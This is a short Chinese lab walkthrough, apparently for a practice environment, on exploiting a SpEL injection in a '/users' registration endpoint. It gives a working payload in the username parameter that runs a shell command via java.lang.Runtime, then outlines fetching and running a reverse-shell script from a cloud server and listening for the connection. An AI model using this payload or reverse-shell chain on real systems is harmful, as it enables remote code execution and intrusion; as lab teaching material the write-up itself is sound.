开启环境后访问 IP/users
抓包修改加上 poc :
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=
回到kali docker exec -it 自己的id /bin/bash
反弹shell
云服务器写⼀个 反弹shell 脚本
把云服务器上的下载下来
执行脚本 /bin/bash /tmp/shell.sh
在回到云服务器上监听